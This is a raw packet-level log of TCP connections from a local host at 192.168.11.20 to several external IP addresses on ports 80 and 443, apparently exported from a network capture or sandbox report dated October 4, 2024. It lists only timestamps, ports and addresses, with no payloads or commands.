                                                                                                                                                    Oct 4, 2024 11:57:20.898125887 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.898977995 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.899184942 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.899224043 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.899426937 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.900440931 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.900698900 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.900736094 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.901000977 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.901649952 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.901818991 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.901856899 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.901916981 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.902053118 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.902101040 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.902127981 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:02.960813046 CEST4973280192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 11:58:03.143460989 CEST804973291.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:03.143707037 CEST4973280192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 11:58:03.145682096 CEST4973280192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 11:58:03.329385042 CEST804973291.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:03.329452991 CEST804973291.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:03.329694986 CEST4973280192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 11:58:03.333314896 CEST4973280192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 11:58:03.515383959 CEST804973291.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:18.520044088 CEST4973380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:18.717586994 CEST8049733185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:18.717860937 CEST4973380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:18.719450951 CEST4973380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:18.916760921 CEST8049733185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:18.916870117 CEST8049733185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:18.916934013 CEST8049733185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:18.917233944 CEST4973380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:20.221435070 CEST4973380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:21.238589048 CEST4973480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:21.431366920 CEST8049734185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:21.431519985 CEST4973480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:21.432881117 CEST4973480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:21.626135111 CEST8049734185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:21.626240015 CEST8049734185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:21.626307011 CEST8049734185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:21.626476049 CEST4973480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:22.939546108 CEST4973480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:23.956821918 CEST4973580192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:24.150434971 CEST8049735185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:24.150743961 CEST4973580192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:24.152307987 CEST4973580192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:24.345792055 CEST8049735185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:24.345891953 CEST8049735185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:24.345967054 CEST8049735185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:24.346023083 CEST8049735185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:24.346414089 CEST8049735185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:24.346503973 CEST8049735185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:24.346707106 CEST4973580192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:25.657761097 CEST4973580192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:26.675025940 CEST4973680192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:26.868309975 CEST8049736185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:26.868638992 CEST4973680192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:26.870014906 CEST4973680192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:27.063411951 CEST8049736185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:27.063532114 CEST8049736185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:27.063607931 CEST8049736185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:27.063683987 CEST8049736185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:27.063757896 CEST8049736185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:27.063819885 CEST8049736185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:27.063852072 CEST4973680192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:27.064045906 CEST4973680192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:27.067271948 CEST4973680192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 11:58:27.260307074 CEST8049736185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.289547920 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:32.390136957 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.390367985 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:32.391753912 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:32.492080927 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.494491100 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.494594097 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.494687080 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.494750977 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:32.494780064 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.494930029 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.494992018 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.495008945 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:32.495083094 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.495146990 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.495162964 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:32.495232105 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.495301008 CEST8049737184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.495304108 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:32.495500088 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:33.905963898 CEST4973780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:34.923208952 CEST4973880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:35.024451017 CEST8049738184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:35.024619102 CEST4973880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:35.026010036 CEST4973880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 11:58:35.127758026 CEST8049738184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:35.129125118 CEST8049738184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:35.129241943 CEST8049738184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:59.635406017 CEST804974513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:59.635586977 CEST4974580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:58:59.637206078 CEST4974580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:58:59.738305092 CEST804974513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:59.738904953 CEST804974513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:59.739043951 CEST4974580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:01.149876118 CEST4974580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:01.250967979 CEST804974513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:02.167201996 CEST4974680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:02.268579006 CEST804974613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:02.268847942 CEST4974680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:02.270221949 CEST4974680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:02.370692968 CEST804974613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:02.370898008 CEST804974613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:02.371082067 CEST4974680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:03.774233103 CEST4974680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:03.874932051 CEST804974613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:04.791667938 CEST4974780192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:04.894252062 CEST804974713.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:04.894424915 CEST4974780192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:04.895952940 CEST4974780192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:04.896003008 CEST4974780192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:04.997262955 CEST804974713.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:04.997374058 CEST804974713.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:04.997390032 CEST804974713.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:04.997483015 CEST804974713.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:04.997607946 CEST804974713.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:04.997854948 CEST804974713.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:04.997865915 CEST804974713.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:07.416065931 CEST4974880192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:07.518692017 CEST804974813.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:07.518878937 CEST4974880192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:07.520243883 CEST4974880192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:07.621340990 CEST804974813.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:07.622317076 CEST804974813.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:07.622328997 CEST804974813.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:07.622669935 CEST4974880192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:07.624577045 CEST4974880192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:07.725729942 CEST804974813.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:13.545484066 CEST4974980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:13.849970102 CEST804974943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:13.850195885 CEST4974980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:13.851603985 CEST4974980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:14.156218052 CEST804974943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:14.156435013 CEST804974943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:14.156471014 CEST804974943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:14.156696081 CEST4974980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:15.365458965 CEST4974980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:16.382847071 CEST4975080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:16.700596094 CEST804975043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:16.700757980 CEST4975080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:16.702156067 CEST4975080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:17.018198967 CEST804975043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:17.018568993 CEST804975043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:17.018681049 CEST804975043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:17.018827915 CEST4975080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:18.208611965 CEST4975080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:19.226068974 CEST4975180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:19.530942917 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.531124115 CEST4975180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:19.532650948 CEST4975180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:19.532670021 CEST4975180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:19.835916996 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.836016893 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.836035967 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.836141109 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.836306095 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.836502075 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.836638927 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.836674929 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.836895943 CEST4975180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:21.036117077 CEST4975180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:22.053488016 CEST4975280192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:22.374299049 CEST804975243.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:22.374506950 CEST4975280192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:22.376099110 CEST4975280192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:22.695951939 CEST804975243.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:22.696135044 CEST804975243.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:22.696171045 CEST804975243.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:22.696492910 CEST4975280192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:22.698390961 CEST4975280192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:23.018486977 CEST804975243.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:33.255047083 CEST4975380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:33.455446959 CEST804975331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:33.455638885 CEST4975380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:33.457011938 CEST4975380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:33.657319069 CEST804975331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:34.102020979 CEST804975331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:34.103008986 CEST804975331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:34.103136063 CEST4975380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:34.970551014 CEST4975380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:35.987934113 CEST4975480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:36.203608990 CEST804975431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:36.203784943 CEST4975480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:36.205195904 CEST4975480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:36.404243946 CEST804975431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:36.962382078 CEST804975431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:36.967308044 CEST804975431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:36.967467070 CEST4975480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:37.719955921 CEST4975480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:38.737591028 CEST4975580192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:38.945449114 CEST804975531.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:38.945693016 CEST4975580192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:38.947175980 CEST4975580192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:38.947225094 CEST4975580192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:39.150408983 CEST804975531.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:39.150521994 CEST804975531.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:39.616698027 CEST804975531.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:39.617211103 CEST804975531.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:39.617332935 CEST4975580192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:40.453782082 CEST4975580192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:41.471100092 CEST4975680192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:41.671283007 CEST804975631.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:41.671489954 CEST4975680192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:41.672863007 CEST4975680192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:41.871471882 CEST804975631.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:42.268728971 CEST804975631.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:42.269058943 CEST804975631.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:42.269474983 CEST4975680192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:42.272608042 CEST4975680192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:42.471151114 CEST804975631.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:47.745839119 CEST4975780192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:47.845372915 CEST8049757191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:47.845654964 CEST4975780192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:47.847079992 CEST4975780192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:47.946476936 CEST8049757191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:48.483172894 CEST8049757191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:11.253650904 CEST804977491.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:11.253809929 CEST4977480192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:12.574222088 CEST4977480192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:13.591584921 CEST4977580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:13.773325920 CEST804977591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:13.773556948 CEST4977580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:13.775104046 CEST4977580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:13.775151968 CEST4977580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:13.957463026 CEST804977591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:13.957478046 CEST804977591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:13.957489967 CEST804977591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:13.957499027 CEST804977591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:13.957597971 CEST4977580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:13.957632065 CEST804977591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:13.957643986 CEST804977591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:14.139002085 CEST804977591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:16.294078112 CEST4977680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:16.475518942 CEST804977691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:16.475698948 CEST4977680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:16.477073908 CEST4977680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:16.658973932 CEST804977691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:16.659085035 CEST804977691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:16.659292936 CEST4977680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:16.661170959 CEST4977680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:16.842573881 CEST804977691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:29.822829008 CEST4977780192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:30.004241943 CEST804977791.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:30.004417896 CEST4977780192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:30.005768061 CEST4977780192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:30.187117100 CEST804977791.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:30.187129974 CEST804977791.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:30.187289953 CEST4977780192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:31.509205103 CEST4977780192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:32.525192022 CEST4977880192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:32.706439972 CEST804977891.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:32.706626892 CEST4977880192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:32.708153009 CEST4977880192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:32.889719963 CEST804977891.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:32.889760971 CEST804977891.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:32.889888048 CEST4977880192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:34.210048914 CEST4977880192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:35.227607012 CEST4977980192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:35.409238100 CEST804977991.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:35.409410954 CEST4977980192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:35.410921097 CEST4977980192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:35.410973072 CEST4977980192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:35.592977047 CEST804977991.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:35.592995882 CEST804977991.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:35.593009949 CEST804977991.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:35.593019962 CEST804977991.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:35.593030930 CEST804977991.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:35.593043089 CEST804977991.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:35.593192101 CEST804977991.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:37.930090904 CEST4978080192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:38.111619949 CEST804978091.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:38.111794949 CEST4978080192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:38.113126040 CEST4978080192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:38.294991970 CEST804978091.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:38.295007944 CEST804978091.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:38.295267105 CEST4978080192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:38.297207117 CEST4978080192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:38.478843927 CEST804978091.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:43.303886890 CEST4978180192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:43.496571064 CEST8049781185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:43.496727943 CEST4978180192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:43.498101950 CEST4978180192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:43.690749884 CEST8049781185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:43.690882921 CEST8049781185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:43.690900087 CEST8049781185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:43.691054106 CEST4978180192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:45.004597902 CEST4978180192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:46.021997929 CEST4978280192.168.11.20185.134.245.113
